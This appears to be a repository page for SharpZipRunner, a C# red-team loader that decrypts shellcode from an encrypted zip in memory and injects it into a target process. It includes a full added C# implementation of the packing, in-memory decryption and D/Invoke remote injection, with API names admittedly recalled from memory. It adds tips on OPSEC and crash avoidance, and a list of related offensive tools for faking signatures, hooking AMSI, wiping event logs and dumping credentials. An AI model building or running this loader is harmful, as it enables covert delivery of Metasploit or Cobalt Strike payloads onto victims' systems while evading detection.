  • Stars: 301
  • Rank: 137,778 (Top 3 %)
  • Language: C#
  • License: GNU General Publi...
  • Created: almost 4 years ago
  • Updated: almost 4 years ago


Repository Details

Executes position independent shellcode from an encrypted zip

SharpZipRunner

Executes position independent shellcode from an encrypted zip. Get position independent code (PIC) from your .NET assembly with donut, or use raw-format shellcode produced by Metasploit or Cobalt Strike.

Zip the .bin file and encrypt the archive with a password; this assembly decrypts the zip entry in memory and executes it using D/Invoke's injection API.

Capable of injecting into a running process, or of creating a new process first and injecting into that newly created process. Self-injection should theoretically be possible, but causes crashes; as injecting into yourself is not really what I wanted to achieve here, I did not really try to fix that issue.

Tested by dropping the encrypted zip on disk, but it could probably also work entirely in memory with some modifications. Only supports PIC payloads; I tried creating a RunPE variant but failed miserably :)

 ___  _                   ____ _       ___
/ __>| |_  ___  _ _  ___ |_  /<_> ___ | . \ _ _ ._ _ ._ _  ___  _ _
\__ \| . |<_> || '_>| . \ / / | || . \|   /| | || ' || ' |/ ._>| '_>
<___/|_|_|<___||_|  |  _//___||_||  _/|_\_\`___||_|_||_|_|\___.|_|
                    |_|          |_|


An encrypted zip on your computer? What could possibly go wrong?

 Usage:
  -z, --zip-file=VALUE       The path on disk to the encrypted zip

  -e, --entry=VALUE          The specific zip entry to put in mem (optional),
                               if not provided assumes only one zip entry is
                               present

  -p, --password=VALUE       The password of the encrypted zip

  -i, --process=VALUE        The process to inject into (if not used, will
                               inject into self (not recommended))

  -c, --create               Create a new process and inject into that
                               process (requires the process argument)

  -h, --help                 shows this menu
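The workflow the README and the usage text describe, as an added example in C#. This is not SharpZipRunner's own code: it shows the operator side (packing a raw PIC .bin into a password-protected zip entry with SharpZipLib) and the loader side (decrypting that one entry straight into a byte[] and handing it to the D/Invoke injection API, either into a running process or into one spawned first, mirroring -i and -c). It assumes the ICSharpCode.SharpZipLib and DInvoke packages are referenced; the DInvoke.Injection type and method names (PICPayload, SectionMapAlloc, RemoteThreadCreate, Injector.Inject) are written from memory of that API and should be checked against the DInvoke version you build against.

```csharp
// Added example, not SharpZipRunner's own code. Two halves of the workflow:
// (1) pack a raw PIC .bin into a password-protected zip with SharpZipLib, and
// (2) on the target, decrypt that entry into a byte[] and hand it to the D/Invoke
//     injection API, into a running process or into one we spawn first.
// Assumptions: ICSharpCode.SharpZipLib and DInvoke are referenced, and the
// DInvoke.Injection names below are as I recall them (verify against your version).
using System;
using System.Diagnostics;
using System.IO;
using ICSharpCode.SharpZipLib.Zip;
using DInvoke.Injection;

static class ZipRunnerExample
{
    // Operator side: wrap payload.bin in a single encrypted zip entry.
    // aes = true selects WinZip AES-256 (ZipEntry.AESKeySize) instead of the default
    // traditional ZipCrypto, which is known-plaintext attackable and cheap to brute-force.
    public static void Pack(string binPath, string zipPath, string password, bool aes = true)
    {
        byte[] pic = File.ReadAllBytes(binPath);
        using (var zos = new ZipOutputStream(File.Create(zipPath)))
        {
            zos.Password = password;               // must be set before PutNextEntry
            var entry = new ZipEntry(Path.GetFileName(binPath));
            if (aes) entry.AESKeySize = 256;
            zos.PutNextEntry(entry);
            zos.Write(pic, 0, pic.Length);
            zos.CloseEntry();
        }
    }

    // Loader side: decrypt one entry into memory. No plaintext copy touches disk.
    public static byte[] ReadEntry(string zipPath, string password, string entryName)
    {
        using (var zf = new ZipFile(zipPath))
        {
            zf.Password = password;
            ZipEntry entry;
            if (entryName != null)
            {
                entry = zf.GetEntry(entryName);
                if (entry == null) throw new FileNotFoundException("entry not in archive", entryName);
            }
            else
            {
                // Same rule as SharpZipRunner's -e: no name given means exactly one entry.
                if (zf.Count != 1) throw new InvalidOperationException("archive has " + zf.Count + " entries; name one");
                entry = zf[0];
            }
            using (Stream s = zf.GetInputStream(entry))   // a wrong password fails here (ZipException)
            using (var ms = new MemoryStream())
            {
                s.CopyTo(ms);
                return ms.ToArray();
            }
        }
    }

    // Target selection: an already running process by image name (-i), or a fresh one we start (-c).
    public static Process ResolveTarget(string processName, bool create)
    {
        if (create)
            return Process.Start(new ProcessStartInfo(processName) { UseShellExecute = false });
        Process[] found = Process.GetProcessesByName(Path.GetFileNameWithoutExtension(processName));
        if (found.Length == 0) throw new ArgumentException("no running process named " + processName);
        return found[0];
    }

    // D/Invoke: map the PIC into the target through a section object and run it on a new remote thread.
    public static bool Inject(byte[] pic, Process target)
    {
        var payload = new PICPayload(pic);
        return Injector.Inject(payload, new SectionMapAlloc(), new RemoteThreadCreate(), target);
    }

    // pack <payload.bin> <out.zip> <password>
    // run  <in.zip> <password> <process> [entry] [--create]
    static int Main(string[] args)
    {
        if (args.Length == 4 && args[0] == "pack")
        {
            Pack(args[1], args[2], args[3]);
            return 0;
        }
        if (args.Length >= 4 && args[0] == "run")
        {
            bool create = Array.IndexOf(args, "--create") >= 0;
            string entry = args.Length >= 5 && args[4] != "--create" ? args[4] : null;
            byte[] pic = ReadEntry(args[1], args[2], entry);
            Process target = ResolveTarget(args[3], create);
            Console.WriteLine(Inject(pic, target) ? "injected into PID " + target.Id : "injection failed");
            return 0;
        }
        Console.Error.WriteLine("usage: pack <bin> <zip> <pw> | run <zip> <pw> <process> [entry] [--create]");
        return 1;
    }
}
```

Two things a practitioner should keep in mind with this flow, and with the tool's own -p and -c options. The password is passed on the command line, so it lands in any process-creation telemetry that records command lines (Windows event 4688 with command-line auditing, Sysmon event 1); the encrypted zip protects the payload at rest from casual inspection, not from anyone who can read that log. And injecting immediately after Process.Start races the new process's initialization; spawning it suspended and resuming after the remote thread is created is the usual way to avoid the crashes that can come from that.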

More Repositories

1. LazySign (PowerShell, 542 stars): Create fake certs for binaries using windows binaries and the power of bat files
2. Invoke-DLLClone (PowerShell, 200 stars): Koppeling x Metatwin x LazySign
3. SharpHandler (C#, 181 stars)
4. AmsiHooker (C#, 167 stars): Hookers are cooler than patches.
5. GG-AESY (C#, 146 stars): Hide cool stuff in images :)
6. TrustJack (C#, 142 stars): Yet another PoC for https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
7. SharpNukeEventLog (C#, 115 stars): nuke that event log using some epic dinvoke fu
8. SharpLNKGen-UI (C#, 97 stars): UI for creating LNKs
9. SharpRDPDump (C#, 87 stars): Create a minidump of TermService for clear text pw extraction
10. Backdoorplz (C++, 79 stars): adding a backdoor user using win32api
11. Red-EC2 (58 stars): Spin up RedTeam infrastructure on AWS via Ansible
12. DeepSleep (C, 57 stars): all credits go to @mgeeky
13. CSharpReflectionWorkshop (C#, 37 stars): The repository that complements the "From zero to hero: creating a reflective loader in C#" workshop
14. Clippi-B (C#, 34 stars)
15. FunWithServerless (Python, 23 stars)
16. Emulation-Workshop (C#, 23 stars): The repository accompanying the Buer Emulation workshop
17. Ansible-EmpireSuite (23 stars): Ansible roles to download and install Empire (BC-Security), DeathStar (byt3bl33der) and Starkiller (BC-Security)
18. CMDLL (C++, 22 stars): the most basic DLL ever to pop a cmd.
19. talks-cons (C#, 17 stars): aggregated repo for all conferences and talks I am giving
20. Ansible-Cobalt-Strike (17 stars): An Ansible role to install Cobalt Strike
21. Red-Route53-Interactive (13 stars)
22. SharpXOR (C#, 12 stars): XOR crypt/decrypt using C#
23. blogposts-talks-and-tidbits (C, 12 stars): all random stuff that doesn't warrant a separate repo
24. Parsers (Python, 12 stars): parsers to make life easier
25. DRegHide (C#, 8 stars): fun stuff with null bytes and dinvoke
26. sharpbysentinel (C#, 7 stars): lol firewall
27. impacket-nomulti-adcs-shadowcreds (Python, 7 stars): in case clients are annoying with enforcing signing :)
28. SEC565-Tools (PowerShell, 5 stars)
29. NerveGas (C#, 4 stars): messing around with ETW in C#
30. x33fcon-workshop (PowerShell, 3 stars)
31. RegFetch (C++, 2 stars): Interfaces with winsockets to fetch a txt file, parses the file and changes the registry accordingly
32. BeFree (PowerShell, 2 stars): get rid of pesky registry restrictions.
33. Get-ServiceACL (PowerShell, 1 star): courtesy of a gist I found on github